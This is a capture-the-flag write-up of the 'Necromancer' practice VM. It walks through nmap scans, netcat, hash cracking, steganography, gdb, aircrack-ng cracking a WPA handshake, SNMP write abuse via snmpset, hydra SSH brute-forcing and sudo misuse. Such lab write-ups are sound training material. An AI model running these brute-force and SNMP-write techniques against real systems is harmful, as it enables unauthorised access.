Necromancer One – Writeup


This machine is,87/

Recon Phase

I started off by using nmap to locate the machine on the network

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00024s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for
Host is up (0.00014s latency).
MAC Address: 08:00:27:FD:FB:BC (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00057s latency).
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.46 seconds

Next I try a service discovery scan

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.00051s latency).
All 1000 scanned ports on are filtered
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds

This was surprising, so I decided to try a broader scan, this time on udp

root@kali:~# nmap -sU -p1-2000
Nmap scan report for
Host is up (0.00056s latency).
Not shown: 1999 open|filtered ports
666/udp open  doom
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 43.15 seconds

Flag Hunting

So as there was only one open port that I knew about, I connected to it with nc

root@kali:~# nc -u 666

I then tried sending various things to it, but all I ever got back was

You gasp for air! Time is running out!

With no other leads on how to connect to the machine, I thought that maybe it was trying to connect to me. So using tcpdump I looked for anything useful

root@kali:~# tcpdump -i eth0

And inside the output I found

17:33:04.084325 IP > kali.4444: Flags [S], seq 3531174093, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3681365611 ecr 0], length 0
17:33:04.084359 IP kali.4444 > Flags [R.], seq 0, ack 3531174094, win 0, length 0

The machine was trying to connect to me on port 4444, so using nc I opened a listener

root@kali:~# nc -lp 4444

I then waited, and eventually


I realised this was base64 and decoded it

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"

So I found flag one, and a hint for the next one, the idea of "chant the string" made me thing I should send it, and I took u666 to mean udp port 666 as I already knew it was open. "the string of flag1" made me realise the flag contained an md5 hash, which i cracked

e6078b9b1aac915d11b9fd59791030bf : opensesame

I then passed this to udp port 666

root@kali:~# echo "opensesame" | nc -u 666
A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.
666 is closed.

The mention of a numerical 80 makes me think port 80 may now be open, hosting a webserver, so in browser I head over to I also crack the md5 for the flag encase it is helpful

c39cd4df8f2e35d20d92c2e44de5f7c6 : 1033750779

Screenshot 1

As the text made specific reference to the image, I downloaded it for inspection.

root@kali:~# file pileoffeathers.jpg
pileoffeathers.jpg: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x290, frames 3
root@kali:~# binwalk pileoffeathers.jpg
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, little-endian offset of first image directory: 8
270           0x10E           Unix path: /"> <rdf:Description rdf:about="" xmlns:xmp="" xmlns:xmpMM="http
36994         0x9082          Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267         0x9193          End of Zip archive

There was a hidden zip file in the image, so I extracted it

root@kali:~# unzip pileoffeathers.jpg

This resulted in a file called pileoffeathers.txt which I then read

root@kali:~# cat pileoffeathers.txt

This was more base64 which I quickly decoded

flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm

Now I have the 3rd flag, and a clue. I head to in browser and crack the md5 of the flag

9ad3f62db7b91c28b68137000394639f : 345465869

Screenshot 2

I Start by downloading the image and inspecting it, but this time find nothing. There was also nothing in the html source. So I fire up dirbuster to look for anything else in this directory

Screenshot 3

Once dirbuster finishes, the only interesting result is /amagicbridgeappearsatthechasm/talisman which when navigated to offers download of a binary file called talisman. I downloaded the file and begin to inspect it

root@kali:~# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

I then try to run it, but am unable to. It turned out after a bit of research that as I am running 64 bit, and this is a 32 bit program I was needed to install some things. I used to fix this and then attempted to run the file again

root@kali:~# ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it's surface.
Do you want to wear the talisman?

In the input I then put "yes"

Nothing happens.

Then the program exited, so I hooked it up to gdb to take a look at what functions there are

root@kali:~# gdb ./talisman
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482d0  _init
0x08048310  printf@plt
0x08048320  __libc_start_main@plt
0x08048330  __isoc99_scanf@plt
0x08048350  _start
0x08048380  __x86.get_pc_thunk.bx
0x08048390  deregister_tm_clones
0x080483c0  register_tm_clones
0x08048400  __do_global_dtors_aux
0x08048420  frame_dummy
0x0804844b  unhide
0x0804849d  hide
0x080484f4  myPrintf
0x08048529  wearTalisman
0x08048a13  main
0x08048a37  chantToBreakSpell
0x08049530  __libc_csu_init
0x08049590  __libc_csu_fini
0x08049594  _fini

The function chantToBreakSpell grabs my attention, so I run the program and cause it to run the function

(gdb) break main
(gdb) run
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337

Another flag, it looks like I need to send the result of an md5 crack to a udp port again, so I crack the md5

ea50536158db50247e110a6c89fcf3d3 : blackmagic

And then send the words via nc

root@kali:~# echo "blackmagic" | nc -u 31337
As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until.... silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.

A flag! First I cracked this new md5 hash

0766c36577af58e15545f099a3b15e60 : 809472671

Next I checkout the url by navigating to

Screenshot 4

Screenshot 5

With a new flag I crack the hash again

b1c3ed8f1db4258e4dcb0ce565f6dc03 : 1756462165

Next I notice the word necromancer links to /thenecromancerwillabsorbyoursoul/necromancer which downloads another file, so I save and inspect it

root@kali:~# file necromancer
necromancer: bzip2 compressed data, block size = 900k

It is a bzip2, so I extracted it

root@kali:~# tar xvjf ./necromancer

This led to a file called necromancer.cap which I then inspected

root@kali:~# file necromancer.cap
necromancer.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)

I then inspected it manually and worked out it was authentication packets for a network so I use aircrack-ng with rockyou.txt as a wordlist to see if I can get any keys from it

root@kali:~# aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt
Opening ./necromancer.cap
Read 2197 packets.
   #  BSSID              ESSID                     Encryption
   1  C4:12:F5:0D:5E:95  community                 WPA (1 handshake)
Choosing first network as target.
Opening ./necromancer.cap
Reading packets, please wait...
                                  Aircrack-ng 1.2
      [00:00:02] 16088/9822768 keys tested (7809.11 k/s)
      Time left: 20 minutes, 55 seconds                          0.16%
                           KEY FOUND! [ death2all ]
      Master Key     : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC
                       DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7
      Transient Key  : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C
                       56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3
                       C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92
                       3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D
      EAPOL HMAC     : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E

I now have a key but nowhere to use it. So I next investigate the port u161 clue and scan it with nmap

root@kali:~# nmap -sU -p161
Nmap scan report for
Host is up (0.00031s latency).
161/udp open  snmp
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

I had to go away and do some reading on snmp at this point, but when I came back I wondered if the key found by aricrack-ng (death2all) could be the community key in snmp so using snmp-check I try it

root@kali:~# snmp-check -c death2all
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (
[+] Try to connect to using SNMPv1 and community 'death2all'
[*] System information:
  Host IP address               :
  Hostname                      : Fear the Necromancer!
  Description                   : You stand in front of a door.
  Contact                       : The door is Locked. If you choose to defeat me, the door must be Unlocked.
  Location                      : Locked - death2allrw!
  Uptime snmp                   : -
  Uptime system                 : -
  System date                   : -

It looks like I need to change the value from Locked - death2allrw! to Unlocked here. Also the death2allrw si interesting as death2all is the key, and rw means read-write. Maybe this is a key with read-write privileges. So I run snmp-check again this time using death2allrw as the key

root@kali:~# snmp-check -c death2allrw
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (
[+] Try to connect to using SNMPv1 and community 'death2allrw'
[*] System information:
  Host IP address               :
  Hostname                      : Fear the Necromancer!
  Description                   : You stand in front of a door.
  Contact                       : The door is Locked. If you choose to defeat me, the door must be Unlocked.
  Location                      : Locked - death2allrw!
  Uptime snmp                   : 04:11:13.83
  Uptime system                 : 04:11:07.31
  System date                   : 2018-5-20 13:01:32.0

This resulted in a lot more details, but none were helpful. So I try snmp-walk instead

root@kali:~# snmpwalk -c death2allrw -v1
iso. = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso. = STRING: "Locked - death2allrw!"

In the massive output which was presented to me, I now had the location I wanted to overwrite, so using snmpset I overwrote it

root@kali:~# snmpset -c death2allrw -v 1 iso. s "Unlocked"
iso. = STRING: "Unlocked"

Then using snmp-check again (with the key which led to the smaller output) I checked for changes

root@kali:~# snmp-check -c death2all
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (
[+] Try to connect to using SNMPv1 and community 'death2all'
[*] System information:
  Host IP address               :
  Hostname                      : Fear the Necromancer!
  Description                   : You stand in front of a door.
  Contact                       : The door is unlocked! You may now enter the Necromancer's lair!
  Location                      : flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22
  Uptime snmp                   : -
  Uptime system                 : -
  System date                   : -

I now have the 7th flag and a hint at port t22 which is normally ssh. First I cracked the hash

9e5494108d10bbd5f9e7ae52239546c4 : demonslayer

As I had no username or password, I assumed that demonslayer was more likely to be the username, and fired up hydra with rockyou.txt to attempt to gain entry

root@kali:~# hydra -s 22 -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra ( starting at 2018-05-20 17:43:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: demonslayer   password: 12345678
1 of 1 target successfully completed, 1 valid password found

I now had ssh access to the machine using the creds demonslayer:12345678 so I used them to get in

root@kali:~# ssh [email protected]

So I now have a shell on the machine and begin to dig around

$ ls
$ cat flag8.txt
You enter the Necromancer's Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
"You are a fool to follow me here!  Do you not know who I am!"
The necromancer turns to face you.  Dark words fill the air!
"You are damned already my friend.  Now prepare for your own death!"
Defend yourself!  Counter attack the Necromancer's spells at u777!

I try for a while to connect using nc from my kali machine

root@kali:~# nc -u 777

But get nothing, so I then try it from my ssh terminal on the machine

$ nc -u localhost 777
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?

It seems to be a quiz, so after some googling I come across and answer "Kelewan"

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with?

I first crack the hash

55a6af2ca3fee9f2fef81d20743bda2c : Kelewan

Then back to google and find so I answer "Mephistopheles"

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate?

I crack the hash

713587e17e796209d1df4c9c2c2d2966 : Mephistopheles

And google again which gives me the answer of "Hedge "

A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

First I break this hash too, although I expect it to just be the answer

8dc6486d2c63cafcdc6efbba2be98ee4 : Hedge

It was, as no new question was asked, I close the nc session and look to see if anything changed

$ ls

But there was nothing new, so I try looking for hidden files

$ ls -la
drwxr-xr-x  3 demonslayer  demonslayer  512 May 21 08:58 .
drwxr-xr-x  3 root         wheel        512 May 11  2016 ..
-rw-r--r--  1 demonslayer  demonslayer   87 May 11  2016 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer  773 May 11  2016 .cshrc
-rw-r--r--  1 demonslayer  demonslayer  103 May 11  2016 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer  359 May 11  2016 .login
-rw-r--r--  1 demonslayer  demonslayer  175 May 11  2016 .mailrc
-rw-r--r--  1 demonslayer  demonslayer  218 May 11  2016 .profile
-rw-r--r--  1 demonslayer  demonslayer  196 May 21 08:57 .smallvile
drwx------  2 demonslayer  demonslayer  512 May 11  2016 .ssh
-rw-r--r--  1 demonslayer  demonslayer  706 May 11  2016 flag8.txt

A file called .smallvile is there, so I check it out

$ file .smallvile
.smallvile: ASCII English text
$ cat .smallvile
You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

A great power, I consider I may be a sudoer now and check

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
User demonslayer may run the following commands on thenecromancer:
    (ALL) NOPASSWD: /bin/cat /root/flag11.txt

I can now read the final flag

$ sudo /bin/cat /root/flag11.txt
Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered......
          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '
                               THE NECROMANCER!
                                 by  @xerubus
Big shout out to Dook and Bull for being test bunnies.
Cheers OJ for the obfuscation help.
Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.
"  xerubus (@xerubus) -  "

And thats the last flag, on the way out I crack its md5

42c35828545b926e79a36493938ab1b1 : hackergod

And that is the necromancer defeated!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.